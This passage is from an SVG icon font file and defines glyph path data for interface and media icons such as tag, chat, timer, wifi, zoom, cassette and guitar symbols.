2 5 6 8 14 7 23 0 2-2 4-5 4z m-78-28c-21-2-40 13-42 35-2 21 14 39 35 41 21 2 40-14 42-35 2-21-14-40-35-41z m-5 56c-10 0-18-9-17-20 0-10 9-18 20-17 10 1 18 10 17 20-1 10-10 18-20 17z m2-27c-5-1-9 3-9 8-1 5 3 9 8 9 4 1 9-3 9-7s-3-9-8-10z" />
<glyph glyph-name="ui-social-link" horiz-adv-x="1000" unicode="&#xec84;" d="M411 483c-23-30-50-53-83-69-81-41-184-27-250 32-71 64-97 163-64 249 34 90 116 148 210 149 152 1 260-138 222-287-2-8-3-13 6-17 70-36 140-72 210-109 29 34 63 57 106 68 80 19 165-17 206-89 42-72 32-165-24-224-70-74-178-81-258-18-8 7-14 8-23 1-41-30-83-60-124-89-7-5-9-8-6-17 26-86-14-168-98-198-57-21-108-6-154 33-70 59-62 159-17 213 51 62 143 76 210 29 13-9 20-8 31 1 39 29 79 57 118 85 8 5 10 10 7 20-15 36-18 74-9 112 1 5-2 11-5 15-4 4-10 6-15 9-65 33-130 67-196 101z m-184 291c-86 0-156-69-156-155 0-88 68-159 156-159 86 0 157 71 158 156 0 88-70 158-158 158z m470-440c-16-44 17-107 64-127 62-27 130-2 158 55 28 59 5 126-52 158-45 25-114 13-137-22 4-3 8-5 12-8 29-14 58-29 86-44 17-10 23-30 15-46-8-18-26-24-45-17-10 3-19 9-28 14-25 12-49 24-73 37z m-264-249c-32 23-79 15-106-15-30-34-30-83 0-117 29-32 78-37 115-12 28 19 45 68 30 86-17-13-35-27-53-39-10-6-23-10-35-10-15 0-24 12-27 27-3 16 4 28 17 38 19 14 39 27 59 42z" />
<glyph glyph-name="ui-tag" horiz-adv-x="1000" unicode="&#xec85;" d="M974 278l-431 431c-34 34-100 75-146 90l-131 45c-46 16-111 0-146-34l-80-81c-34-34-50-99-34-145l47-135c16-46 57-112 92-146l427-427c34-35 90-35 124 0l278 277c34 35 34 91 0 125z m-809 275c-36 36-36 95 0 132 36 36 95 36 132 0s36-96 0-132c-37-36-96-36-132 0z m673-355l-186-186c-17-17-45-17-62 0l-277 277c-17 17-17 45 0 62l185 186c18 17 46 17 63 0l277-277c17-17 17-45 0-62z" />
<glyph glyph-name="ui-text-chat" horiz-adv-x="1000" unicode="&#xec86;" d="M892 827h-784c-59 0-108-49-108-108v-467c0-59 49-108 108-108h223v-271l271 271h290c59 0 108 49 108 108v467c0 59-49 108-108 108z m-37-498c0-12-9-22-21-22h-684c-12 0-22 10-22 22v28c0 12 10 22 22 22h684c12 0 21-10 21-22v-28z m0 155c0-12-9-21-21-21h-684c-12 0-22 9-22 21v29c0 12 10 21 22 21h684c12 0 21-9 21-21v-29z m0 156c0-12-9-22-21-22h-684c-12 0-22 10-22 22v28c0 12 10 22 22 22h684c12 0 21-10 21-22v-28z" />
<glyph glyph-name="ui-text-loading" horiz-adv-x="1000" unicode="&#xec87;" d="M892 827h-783c-60 0-109-49-109-108v-467c0-59 49-108 109-108h222v-271l271 271h290c59 0 108 49 108 108v467c0 59-49 108-108 108z m-660-440c-51 0-92 41-92 92 0 51 41 93 92 93 51 0 93-42 93-93 0-51-42-92-93-92z m268 0c-51 0-92 41-92 92 0 51 41 93 92 93 51 0 93-42 93-93 0-51-42-92-93-92z m268 0c-51 0-93 41-93 92 0 51 42 93 93 93 51 0 92-42 92-93 0-51-41-92-92-92z" />
<glyph glyph-name="ui-theme" horiz-adv-x="1000" unicode="&#xec88;" d="M0 4c4 65 49 120 108 165 17 14 38 24 58 34 72 37 93 68 75 147-13 60 2 100 48 136 23 19 45 41 64 64 18 22 30 18 49-1 85-87 170-173 257-257 23-22 22-35-1-53-11-8-21-18-29-28-51-65-108-105-199-79-50 15-88-17-109-65-28-63-68-116-129-152-26-15-54-25-84-27-68-3-109 36-108 116z m603 258c-15 16-22 26-30 34-51 51-102 101-153 152-43 43-43 43-86-1-3-4-6-8-10-10-21-16-16-29 2-46 58-56 114-114 171-171 10-9 19-32 39-17 23 18 44 39 67 59z m-436-257c30 1 47 18 48 48 0 31-19 51-50 51-29-1-48-18-49-48 0-33 18-49 51-51z m548 293c-8 7-15 13-21 19-89 89-177 178-267 266-18 18-14 27 2 43 56 54 111 109 165 165 26 28 48 28 75 1 76-78 154-156 232-232 28-27 31-49 0-78-55-52-108-107-162-161-7-7-15-14-24-23z m-88 449c-20-23-40-45-60-67-15-18 5-24 13-32 9-10 12-19 5-31-16-31-14-62 11-88 25-26 56-29 87-14 26 13 39-5 46-20 9-23-19-30-30-44-13-17-25-34-7-51 17-17 36-7 51 8 28 29 56 59 86 86 22 19 23 33 1 53-60 57-117 117-175 175-7 6-13 11-28 25z m373-643c-4-56-30-97-81-120-48-22-102-11-140 28-40 40-51 89-28 140 27 56 60 110 91 164 12 21 36 25 49 6 40-64 85-127 108-200 1-6 1-12 1-18z m-130 142c-24-42-47-77-64-115-14-33-7-65 25-87 29-18 58-15 84 6 27 23 34 53 17 85-19 36-39 70-62 111z" />
<glyph glyph-name="ui-timer" horiz-adv-x="1000" unicode="&#xec89;" d="M943 223h-81c-23-67-64-127-117-171h255l-57 171z m-804 0h-82l-57-171h255c-53 44-94 104-116 171z m361 437c-171 0-309-139-309-310 0-171 138-309 309-309 171 0 309 138 309 309 0 171-138 310-309 310z m-2-514c-112 0-204 91-204 204s92 205 204 205c113 0 205-92 205-205s-92-204-205-204z m47 232v109c0 19-17 36-36 36h-17c-20 0-36-17-36-36v-131c0-13 7-25 18-31 1-2 1-3 3-5l92-92c14-14 37-14 51 0l12 12c14 14 14 37 0 51l-87 87z" />
<glyph glyph-name="ui-touch-phone" horiz-adv-x="1000" unicode="&#xec8a;" d="M716 850h-431c-48 0-87-39-87-87v-826c0-48 39-87 87-87h431c48 0 87 39 87 87v826c0 48-39 87-87 87z m-287-36h142c8 0 13-4 13-9 0-4-5-8-13-8h-142c-7 0-13 4-13 8 0 5 6 9 13 9z m71-920c-37 0-67 30-67 67 0 37 30 68 67 68s68-31 68-68c0-37-31-67-68-67z m253 206c0-24-20-44-43-44h-419c-24 0-44 20-44 44v620c0 24 20 43 44 43h419c23 0 43-19 43-43v-620z" />
<glyph glyph-name="ui-travel" horiz-adv-x="1000" unicode="&#xec8b;" d="M277 172h446c34 0 62 28 62 62v266c0 34-28 62-62 62h-40v83c0 34-28 62-62 62h-242c-34 0-62-28-62-62v-83h-40c-34 0-62-28-62-62v-266c0-34 28-62 62-62z m101 421v28c0 17 14 31 31 31h182c17 0 31-14 31-31v-59h-244v31z m-322-489c-31 0-56-25-56-56 0-30 25-55 56-55s55 25 55 55c0 31-25 56-55 56z m177 0c-30 0-55-25-55-56 0-30 25-55 55-55s56 25 56 55c0 31-25 56-56 56z m178 0c-31 0-56-25-56-56 0-30 25-55 56-55 31 0 56 25 56 55 0 31-25 56-56 56z m178 0c-31 0-56-25-56-56 0-30 25-55 56-55s56 25 56 55c0 31-25 56-56 56z m178 0c-31 0-56-25-56-56 0-30 25-55 56-55 30 0 55 25 55 55 0 31-25 56-55 56z m177 0c-30 0-55-25-55-56 0-30 25-55 55-55 31 0 56 25 56 55 0 31-25 56-56 56z" />
<glyph glyph-name="ui-unlock" horiz-adv-x="1000" unicode="&#xec8c;" d="M761 462c1 14 2 29 2 44 0 190-117 344-263 344-119 0-220-104-252-247h113c23 74 77 126 139 126 84 0 152-94 152-210 0-17-2-34-5-51h-358c-109 0-198-89-198-198v-222c0-109 89-198 198-198h422c110 0 199 89 199 198v222c0 92-64 169-149 192z m-213-341v-64c0-55-21-99-48-99-26 0-48 45-48 99v64c-39 18-66 57-66 102 0 63 51 114 114 114 63 0 114-51 114-114 0-45-27-84-66-102z" />
<glyph glyph-name="ui-user-group" horiz-adv-x="1000" unicode="&#xec8d;" d="M692 185c-125 76-255 78-380 6-45-26-73-59-87-95h544c-12 34-38 66-77 89z m-195 419c89 0 160-70 160-159 1-88-71-160-159-161-89-1-160 71-160 161 0 89 70 159 159 159z m467-434c-37 32-80 45-127 47-41 1-81-5-118-27 39-30 63-60 74-94h207c0 26-12 53-36 74z m-683 20c-4 3-6 5-9 6-78 33-154 31-224-17-32-22-48-53-48-83h208c13 35 38 66 73 94z m447 154c0 54 44 99 98 99 54 1 100-44 100-98 1-53-45-100-97-100-56-1-101 44-101 99z m-553-98c-56-1-100 42-100 98-1 54 44 99 99 100 53 0 99-45 99-98 1-56-43-100-98-100z" />
<glyph glyph-name="ui-user" horiz-adv-x="1000" unicode="&#xec8e;" d="M859 47c-230 139-469 144-700 11-82-47-134-109-159-176h1000c-22 64-69 122-141 165z m-359 771c163 0 294-130 295-292 1-162-131-295-293-297-164-1-295 131-296 296 0 163 130 293 294 293z" />
<glyph glyph-name="ui-v-card" horiz-adv-x="1000" unicode="&#xec8f;" d="M892 721h-783c-60 0-109-49-109-109v-523c0-60 49-109 109-109h783c59 0 108 49 108 109v523c0 60-49 109-108 109z m-779-171c0 30 25 54 55 54h181c30 0 55-24 55-54v-209c0-30-25-54-55-54h-181c-30 0-55 24-55 54v209z m736-426h-706c-18 0-33 14-33 32 0 17 15 32 33 32h706c17 0 32-15 32-32 0-18-15-32-32-32z m0 168h-320c-18 0-33 14-33 31 0 18 15 32 33 32h320c17 0 32-14 32-32 0-17-15-31-32-31z m0 130h-320c-18 0-33 15-33 32 0 18 15 32 33 32h320c17 0 32-14 32-32 0-17-15-32-32-32z" />
<glyph glyph-name="ui-video-chat" horiz-adv-x="1000" unicode="&#xec90;" d="M892 827h-783c-60 0-109-49-109-108v-467c0-59 49-108 109-108h222v-271l271 271h290c59 0 108 49 108 108v467c0 59-49 108-108 108z m-224-370l-253-135c-26-14-48-1-48 29v263c0 30 22 43 48 29l253-135c26-14 26-37 0-51z" />
<glyph glyph-name="ui-video-message" horiz-adv-x="1000" unicode="&#xec91;" d="M892 827h-783c-60 0-109-49-109-108v-467c0-59 49-108 109-108h222v-271l271 271h290c59 0 108 49 108 108v467c0 59-49 108-108 108z m-243-476c0-30-22-43-48-29l-253 135c-26 14-26 37 0 51l253 135c26 14 48 1 48-29v-263z" />
<glyph glyph-name="ui-video-play" horiz-adv-x="1000" unicode="&#xec92;" d="M0-65v831h1000v-831h-1000z m372 567v-298c94 50 184 98 278 149-94 51-184 99-278 149z m-251 198v-78h199v78h-199z m760-80v79h-199v-79h199z m-761-619h200v78h-200v-78z m762 79h-199v-79h199v79z m-481 540h197v79h-197v-79z m0-619h198v79h-198v-79z" />
<glyph glyph-name="ui-video" horiz-adv-x="1000" unicode="&#xec93;" d="M955 166c-1 0-2 0-2 0l-104 176 109 185 37 61c-3 1-7 2-12 2h-50l-1 1-1-1h-240v126c0 17-14 32-32 32h-626c-18 0-33-15-33-32v-731c0-18 15-33 33-33h626c18 0 32 15 32 33v103h292c7 0 12 3 17 6l-45 72z m-796-131c0-18-15-33-33-33h-24c-18 0-33 15-33 33v31c0 18 15 33 33 33h24c18 0 33-15 33-33v-31z m8 587c0-19-16-35-36-35h-26c-20 0-36 16-36 35v35c0 19 16 35 36 35h26c20 0 36-16 36-35v-35z m148-587c0-18-15-33-32-33h-25c-18 0-32 15-32 33v31c0 18 14 33 32 33h25c17 0 32-15 32-33v-31z m4 587c0-19-16-35-36-35h-26c-20 0-36 16-36 35v35c0 19 16 35 36 35h26c20 0 36-16 36-35v-35z m54 35c0 19 16 35 36 35h26c20 0 36-16 36-35v-35c0-19-16-35-36-35h-26c-20 0-36 16-36 35v35z m99-622c0-18-15-33-33-33h-24c-18 0-33 15-33 33v31c0 18 15 33 33 33h24c18 0 33-15 33-33v-31z m53 587v35c0 19 16 35 36 35h26c19 0 36-16 36-35v-35c0-19-17-35-36-35h-26c-20 0-36 16-36 35z m103-587c0-18-15-33-32-33h-25c-18 0-32 15-32 33v31c0 18 14 33 32 33h25c17 0 32-15 32-33v-31z m63 479h195l-100-171-2 0 1-1-1-1 2-1 104-177h-199v351z" />
<glyph glyph-name="ui-volume" horiz-adv-x="1000" unicode="&#xec94;" d="M480 387l2-1c-1-1-2 0-2 1z m320-446c-8 3-15 5-22 9-22 13-30 46-14 68 13 17 28 33 41 50 68 91 100 194 94 307-6 113-48 210-125 294-12 13-20 27-18 46 3 22 19 39 42 42 1 1 2 2 3 2h9c20-3 34-17 46-31 24-28 46-57 64-88 40-67 65-140 75-218 2-14 3-29 5-43v-58c-1-3-1-7-2-10-3-24-4-48-9-72-19-95-60-180-123-255-15-18-28-37-53-43h-13z m-119 112c-22 0-38 10-46 30-9 21-3 39 10 56 17 20 34 40 47 62 33 55 45 115 39 178-7 69-35 129-83 180-16 17-22 35-13 58 11 29 51 40 76 20 21-18 38-41 54-64 33-49 54-103 63-162 10-68 4-135-20-200-20-54-51-102-91-143-10-10-22-16-36-15z m-16 290c-1-61-25-118-75-165-16-15-34-19-55-10-19 8-29 23-30 43-1 17 7 31 19 42 23 23 37 51 40 83 4 42-9 79-39 109-12 12-21 26-19 45 1 19 11 33 28 41 17 8 35 7 50-5 28-21 47-49 61-80 14-31 20-62 20-103z m-262 6c0-85 1-170 0-255 0-12-5-29-14-34-8-5-26 0-35 7-67 48-134 97-198 150-13 10-16 36-17 55 0 63 2 125 5 188 1 10 9 23 17 30 63 49 126 97 190 144 10 7 29 12 38 8 9-5 15-23 15-36 2-86-1-172-1-257 0 0-2 1 0 0z m-322 1c0-31 0-63 1-95 0-15-5-22-21-24-56-6-61-3-61 54 0 51 1 103 0 154 0 22 7 31 31 31 50 1 50 2 50-48 0-24 0-48 0-72z" />
<glyph glyph-name="ui-weather" horiz-adv-x="1000" unicode="&#xec95;" d="M775 18c-22-44-56-72-101-86-67-21-126-2-174 48-9 10-15 12-28 8-68-22-128-7-177 45-10 10-19 13-33 10-65-16-135 33-145 100-10 72 41 138 110 142 11 1 22 0 34 0 17 43 45 75 90 91 44 15 86 9 125-14 74 152 279 121 319-24 81 12 145-13 186-86 31-55 23-131-18-182-43-55-111-74-188-52z m-667 410c1 138 101 226 202 237 119 13 224-66 249-179 2-11-1-16-10-23-25-19-48-41-73-61-5-5-15-9-20-7-77 27-159-3-201-75-6-11-12-13-22-14-18-2-36-6-52-13-12-4-18-2-25 7-31 42-46 88-48 128z m395 196c-15 11-27 20-41 31 24 19 46 37 69 55l4-2c-10-27-20-54-32-84z m-379-53c-21 26-38 50-56 73l2 3c27-12 55-24 85-36-11-14-21-26-31-40z m486 63c-19-23-37-46-58-70-9 13-18 25-29 41 29 11 57 22 85 33l2-4z m-435-4c-11 32-21 59-33 93 27-23 50-43 75-64-15-10-27-19-42-29z m264 37c-19 6-33 10-50 16 17 27 33 52 50 79v-95z m-292-390c-31-11-59-21-86-31l-3 3c19 22 38 45 59 70 10-14 19-26 30-42z m-136 67c28 17 53 32 79 48 5-16 10-30 16-48h-95z m280 341c-16-5-31-9-48-14v93c16-27 32-52 48-79z m-181-139c-6-16-11-31-16-48l-74 51 0 4c29-2 58-4 90-7z m201 144l23 86 4 0c7-28 15-56 23-86h-50z m-225-219v-50c-30 8-58 16-86 25l0 4c28 6 56 13 86 21z" />
<glyph glyph-name="ui-wifi" horiz-adv-x="1000" unicode="&#xec96;" d="M454 100l2 2c1-2 0-3-2-2z m546 390c-4-9-6-18-11-27-17-27-57-36-83-17-21 16-41 35-62 51-111 83-236 121-375 114-137-8-257-59-358-152-17-15-34-25-57-22-27 4-47 23-52 50 0 2-1 3-2 5v10c4 25 20 41 38 57 34 29 69 56 107 78 83 49 171 80 266 91 18 3 36 4 54 7h70c4-1 8-2 12-3 30-3 60-5 89-11 116-23 220-73 311-150 22-18 45-35 53-65v-16z m-137-146c-1-26-13-45-37-56-25-11-47-3-68 13-24 20-49 41-76 57-67 40-140 55-218 48-84-9-157-43-219-102-21-19-44-26-71-16-36 14-50 63-25 93 22 26 50 47 78 66 60 40 126 67 198 77 84 13 165 5 245-25 66-24 124-61 174-110 13-12 19-27 19-45z m-355-18c74-2 145-32 202-92 18-20 23-43 12-67-9-23-28-36-53-37-20-1-37 8-51 23-28 28-61 45-101 49-52 5-96-11-133-47-15-16-32-26-55-24-23 1-40 13-50 34-10 21-9 43 6 61 26 34 60 57 98 75 37 16 76 24 125 25z m-8-212c40 0 74-34 74-74 0-40-33-74-74-74-40 0-74 33-74 74 0 40 34 74 74 74z" />
<glyph glyph-name="ui-zoom-in" horiz-adv-x="1000" unicode="&#xec97;" d="M982 61l-235 216c27 54 43 114 43 178 0 218-177 395-395 395-218 0-395-177-395-395 0-218 177-395 395-395 64 0 124 16 178 43l216-235c21-23 56-24 78-2l117 117c22 22 21 57-2 78z m-587 153c-133 0-241 108-241 241s108 241 241 241c133 0 241-108 241-241s-108-241-241-241z m125 283h-89v89c0 12-10 23-23 23h-29c-13 0-23-11-23-23v-89h-89c-13 0-23-11-23-23v-29c0-13 10-23 23-23h89v-89c0-13 10-23 23-23h29c13 0 23 10 23 23v89h89c13 0 23 10 23 23v29c0 12-10 23-23 23z" />
<glyph glyph-name="ui-zoom-out" horiz-adv-x="1000" unicode="&#xec98;" d="M982 61l-235 216c27 54 43 114 43 178 0 218-177 395-395 395-218 0-395-177-395-395 0-218 177-395 395-395 64 0 124 16 178 43l216-235c21-23 56-24 78-2l117 117c22 22 21 57-2 78z m-587 153c-133 0-241 108-241 241s108 241 241 241c133 0 241-108 241-241s-108-241-241-241z m125 283h-253c-13 0-23-10-23-23v-29c0-13 10-23 23-23h253c13 0 23 10 23 23v29c0 12-10 23-23 23z" />
<glyph glyph-name="cassette-player" horiz-adv-x="1000" unicode="&#xec99;" d="M962 563h-94c0 47 0 94 0 141 0 3 0 7 0 11 0 24-12 35-36 35h-112c-183 0-367 0-550 0-8 0-16 0-23-4-11-7-15-17-15-30 0-51 0-102 0-153h-94c-21 0-38-17-38-38v-536c0-22 17-39 38-39h924c21 0 38 17 38 39v536c0 21-17 38-38 38z m-92-349c-1-43-36-77-79-77-43 0-77 36-76 80 0 41 36 76 78 75 43-1 77-35 77-78z m-303 13c0-7-2-9-9-9-39 1-78 1-117 0-7 0-8 3-8 10 0 21 0 43 0 65 0 21 0 42 0 63 0 6 1 9 8 9 39-1 78-1 117 0 6 0 9-1 9-9 0-43 0-86 0-129z m-281-13c-1-42-36-77-78-77-43 0-78 35-78 78 0 43 35 77 78 77 43 0 78-35 78-78z m-91 463c0 8 3 10 10 10 99 0 197 0 296 0 98 0 195 0 293 0 8 0 11-2 11-11 0-37 0-75 0-113h-119c0 9 0 18 0 28 0 17-14 32-31 32-17 0-31-14-32-31 0-10 0-19 0-29h-91c0 9 0 18-1 27 0 19-13 32-30 33-18 0-32-14-32-33-1-9-1-18 0-27h-92c0 9 0 18 0 27 0 18-14 33-31 33-18 0-32-15-32-33 0-9 0-18 0-27h-119c0 38 0 76 0 114z" />
<glyph glyph-name="cassette" horiz-adv-x="1000" unicode="&#xec9a;" d="M1000 596v-490c0-7-2-13-4-19-15-45-56-71-108-71-167 0-334 0-500 0-94 0-188 0-282 0-52 1-93 34-104 84 0 1-1 4-1 4l-1 490c0 3 0 6 1 8 9 43 46 82 90 82 29 0 44 0 71 0 11 1 16-4 22-13 36-61 72-121 108-182 6-10 13-14 24-14 122 0 244 0 366 0 12 0 20 4 26 15 37 62 75 124 112 186 3 6 6 8 13 8 21-1 41 0 62 0 48-1 92-32 104-78 1-3 1-5 1-10z m-500-205v0c-34 0-68 0-102 0-14 0-23-8-23-21 0-41 0-82 0-123 0-14 9-22 22-22 69 0 137 0 205 0 14 0 23 9 23 23 0 40 0 80 0 120 0 16-8 23-24 23-33 0-67 0-101 0z m-395-82c-1-58 45-104 103-105 57 0 104 47 105 104 0 57-47 104-104 104-57 1-104-46-104-103z m685-105c57-1 104 45 105 104 2 55-45 103-101 104-57 2-105-44-106-101-2-57 44-105 102-107z m-14 479c-23-37-44-74-66-110-10-17-20-33-30-50-3-5-6-7-12-7-112 0-224 0-335 0-5 0-9 0-12 5-31 53-63 106-95 158 0 1 0 2-1 4h551z m-276-417c-25 0-49 1-74 0-8 0-10 3-10 10 1 22 0 44 0 66 0 6 2 8 8 8 51 0 101 0 152 0 6 0 8-2 8-8-1-22-1-45 0-68 0-7-3-8-9-8-25 0-50 0-75 0z m-354 42c0 35 28 63 62 63 34 0 63-28 63-62 0-35-28-63-62-63-35 0-63 27-63 62z m708 0c0-34-28-62-62-62-35 0-63 28-63 62 0 34 28 63 63 63 34 0 62-28 62-63z" />
<glyph glyph-name="forward" horiz-adv-x="1000" unicode="&#xec9b;" d="M498 850c-274-2-498-228-496-501 1-276 228-501 502-499 275 2 497 227 495 501-2 278-226 501-501 499z m220-533c-59-35-119-69-180-102-35-20-57-6-58 35 0 9 0 18 0 26-36-20-71-41-108-61-35-20-57-6-58 35 0 33 0 66 0 100h0c0 35 0 70 1 105 1 35 24 49 54 32 38-21 74-43 111-64 0 11 0 21 1 32 1 35 24 49 55 32 62-34 123-70 184-107 31-18 29-44-2-63z" />
<glyph glyph-name="guiter" horiz-adv-x="1000" unicode="&#xec9c;" d="M606 397c35-58 31-106-9-148-35-36-68-75-102-112-6-7-8-14-7-24 16-118-54-224-169-255-134-37-273 60-285 199-12 128 76 236 203 251 2 1 5 1 8 1 30-7 50 8 68 31 26 33 55 63 83 93 39 43 78 51 132 29 10-4 12-7 4-15-67-74-134-148-200-223-3-2-5-5-8-8-10-13-20-20-38-21-40-1-73-42-69-81 4-45 42-78 84-75 43 4 76 40 73 82-1 13 2 21 11 30 70 78 140 156 210 234 3 4 7 7 11 12z m-377-278c1 38 32 68 69 66 10-1 15 1 22 8 105 118 211 236 317 354 40 44 80 88 119 132 4 5 9 9 6 17-7 18-2 35 10 49 8 9 4 13-5 14-11 1-17 6-16 17 0 8 5 14 13 15 11 1 17-4 19-15 1-4 3-9 8-8 5 2 10 7 11 14 1 5-4 6-9 6-11 1-16 7-16 18 1 8 6 13 14 14 10 1 16-3 18-14 1-5 3-10 9-8 4 2 9 8 11 13 1 5-5 6-10 6-9 2-16 7-16 17 0 9 6 15 15 16 9 1 16-4 18-14 2-11 7-11 17-7 26 12 49 3 69-15 19-17 30-40 21-66-4-12-1-16 10-17 9-1 15-6 15-16-1-8-5-14-13-15-10-2-17 3-19 12-2 5-2 12-9 10-5-2-10-7-11-13-1-6 5-6 10-7 9-2 16-6 15-17-1-9-6-14-14-15-10-1-16 4-18 13-1 5-3 11-8 10-6-2-11-8-12-14-1-5 6-6 11-7 9-1 15-6 15-16-1-8-6-14-14-16-10-1-16 4-18 13-3 12-7 14-15 5-12-13-28-17-45-15-8 1-13-1-19-7-145-162-291-325-437-486-7-8-7-16-5-25 4-38-25-73-64-74-38-2-70 30-69 68z" />
<glyph glyph-name="movie" horiz-adv-x="1000" unicode="&#xec9d;" d="M501 850c-274 2-500-223-501-500-1-275 222-498 498-500 277-1 500 220 502 498 2 275-221 499-499 502z m-1-940c-243 0-438 195-440 438-1 244 196 441 440 441 244 0 439-194 440-438 1-244-196-441-440-441z m-122 517c74 0 136 62 137 135 0 74-62 136-136 136-74 1-136-61-137-135 0-73 63-136 136-136z m299-36c73-1 136 62 137 136 1 72-62 136-135 137-73 0-137-62-137-136-1-73 61-136 135-137z m36-27c-74 0-136-62-136-136 0-74 62-136 136-135 74 0 137 62 136 135 0 74-62 136-136 136z m-261-136c-75 0-135-61-134-135 0-75 61-135 136-135 75 1 135 62 135 137-1 75-61 134-137 133z m-73 76c0 74-62 135-136 135-74-1-134-62-134-137 0-74 62-136 136-135 74 0 134 62 134 137z m86 45c0-19 16-35 36-35 19 1 35 17 35 36-1 20-17 35-36 35-20 0-35-16-35-36z" />
<glyph glyph-name="multimedia" horiz-adv-x="1000" unicode="&#xec9e;" d="M461 351l0 0c0 1 0 1 0 2 0 7-5 13-12 13h-68c-7 0-13-6-13-13 0-1 1-2 1-3 0 0-1 0-1 0 0-11-6-10-13-10-82 0-164 0-246 0-12 0-16 4-16 16 0 51 0 103 0 154 0 13 5 17 16 16 30 0 60 0 90 0 10 0 19 0 19 16 0 14-9 13-18 13-61 0-121 0-181 1-16 0-19-6-19-20 1-142 1-283 0-424 0-16 5-20 20-19 70 0 141 0 211 0 71 0 142 0 213 0 13 0 18 2 17 16 0 76 1 159 0 235 0 6 0 7 0 7z m-30-11c10-1 16-6 16-16 0-9-6-14-15-15-9-1-19-1-28 0-10 0-19 4-18 16 1 12 9 16 20 16h10c5 0 10 0 15-1z m-401 186c10 1 19 0 28 0 11 0 20-5 19-16 0-11-8-16-19-16-4 0-9 0-13 0v0c-5 0-10-1-15 0-9 2-14 7-14 16 0 9 5 15 14 16z m31-403c-9 0-17 0-26 0-11 0-19 3-19 15-1 13 8 17 20 16 3 0 7 0 11 0v0c5 0 10 0 15 0 9 0 15-6 15-15 0-9-6-15-16-16z m-4 61c-3 1-7 0-10 0v1c-6 0-12-1-18 0-9 1-14 7-13 16 0 8 4 14 13 14 10 1 20 1 30 1 11 0 19-5 18-16-1-11-9-16-20-16z m6 63c-6-2-12-1-18-1v0c-5 0-10-1-15 0-9 2-16 8-14 18 3 17 17 15 29 15 13 0 28 3 32-14 3-11-5-16-14-18z m-1 62c-9-1-18 0-26-1-12 0-21 4-20 17 0 11 8 16 19 16 4 0 7 0 11 0v0c5 0 10 0 15-1 10-1 16-6 16-16 0-10-7-14-15-15z m2 93c8-2 13-7 13-15 0-9-5-15-14-16-9 0-19 0-28 0-11-1-19 3-19 15 0 13 8 17 20 16 3 0 7 0 11 0v0c5 0 11 0 17 0z m-1 31c-10-1-19 0-28-1-12 0-19 5-19 16-1 11 7 16 18 15 5 0 9 0 13 0v0c5 0 10 0 15 0 10 0 15-6 15-15 0-8-6-15-14-15z m291-310c-42 1-83 0-124 0-40 0-80 1-120 0-13 0-18 3-17 17 0 51 0 103 0 154 0 12 4 16 16 16 82 0 164 0 246 0 11 0 15-3 15-15-1-52-1-104 0-156 0-13-4-16-16-16z m75 0c-4 0-8 0-13 0s-8 0-13 0c-10 0-17 5-17 15 0 11 6 16 17 16 8 0 17 0 26 0 11 0 19-5 18-16 0-10-8-15-18-15z m-1 61l-21 0c-12 0-21 4-21 17 0 13 10 15 20 15 4 0 7 0 11 0v0c4 0 9 0 13 0 10 0 18-4 17-15 0-11-8-16-19-17z m6 63c-6-2-11-1-17-1-6 0-12-1-17 1-9 2-14 7-14 16 0 9 6 14 13 15 12 1 23 1 35 0 8-1 14-7 14-16-1-9-7-13-14-15z m101 159h-17c-76 0-153 1-229 0-13 0-19 3-19 18 1 82 1 164 0 246 0 13 5 17 18 17 133-1 267-1 400 0 14 0 17-5 17-18 0-21 0-42 0-63l0 2v-101c8 1 19 3 28 3h0v1c1 0 2 0 2 0 0 4 0 6 0 11-1 59-1 118 0 176 0 16-5 18-19 18-151 0-303 0-454 0-15 0-20-3-20-19 0-101 0-201 0-302 0-16 5-19 20-19 77 1 153 1 230 0 9 0 16-1 22 0 6 10 14 21 21 30z m-156 153c25-1 48 23 47 47-1 25-22 45-47 44-26 0-45-19-44-45 0-25 20-46 44-46z m189-118c18 16 38 30 60 41l-75 114c-2 3-6 3-8 1l-58-82c-1-2-3-2-5-1l-53 26c-2 1-4 0-5-1l-85-90c-3-3-1-8 3-8l226 0z m188 39c-139 1-250-109-251-247-1-134 112-248 247-249 135 0 248 112 248 248 1 135-110 248-244 248z m-160-277v4c4 8 8 15 16 19 4 2 8 3 12 3 3 1 6 0 6-4 1-3-1-6-4-6-10-2-16-7-19-16-2-5-7-4-11 0z m25-31c-1-2-3-4-7-4-3-1-5 3-4 7 5 19 18 32 37 38 3 0 6 1 9 1 4 1 8 0 8-4 1-5-2-6-6-7-12-1-22-6-29-15-4-5-7-10-8-16z m192-26c-8-1-17 0-24 4-7 3-12 7-15 14-6 10-4 20 3 29 7 9 15 14 26 16 4 1 8 1 12 1 7 0 13-2 19-5 1 0 1 0 1 0 0 2 1 5 1 8l1 24c1 6 1 13 1 19 1 6 1 13 1 19 1 6 1 13 1 19 1 6 1 11 1 16 0 1 0 2-1 2-5-1-10-1-15-2l-17-2c-5 0-10-1-15-1-6-1-11-1-17-2l-15-1c-5-1-11-2-17-2l-14-2c-4 0-8 0-12-1-1 0-1 0-1-1 0-6-1-12-1-19 0-10-1-21-1-32-1-7-1-14-1-21l-1-29c-1-7-1-14-1-21-1-5-1-9-1-14-1-6-3-11-7-15-7-8-16-13-26-15-2 0-5-1-7-1 0 0-1 0-1 0h-4c0 0 0 0-1 0-8 0-15 3-22 8-5 3-9 8-12 15 0 1 0 3-1 5v6c1 0 1 1 1 1 1 6 4 11 8 16 10 9 21 13 34 13 7 0 14-1 20-4 1 0 1 0 1 1 0 5 0 10 1 16l1 30 1 23 1 30c0 8 0 16 1 24 0 8 0 17 1 25 0 1 0 1 1 1 5 1 11 1 17 1 8 1 17 2 25 2 9 1 17 2 26 2 8 1 17 2 25 2 10 1 20 2 30 3 11 0 21 1 31 2 1 0 2 0 4 0 0 0 0 0 0 0v-1c0-2 0-5 0-7-1-9-1-18-2-26 0-7 0-13 0-20-1-10-1-21-2-32 0-9-1-17-1-26 0-11-1-21-1-32-1-8-1-17-1-25-1-4-1-9-2-13-2-6-6-10-11-14-7-7-16-10-26-11z m43-17c-1 0-4 0-5-2h-4c-6 6-5 9 2 12 8 2 13 7 15 15 0 4 2 6 6 6 5-1 5-4 5-8-3-11-9-18-19-23z" />
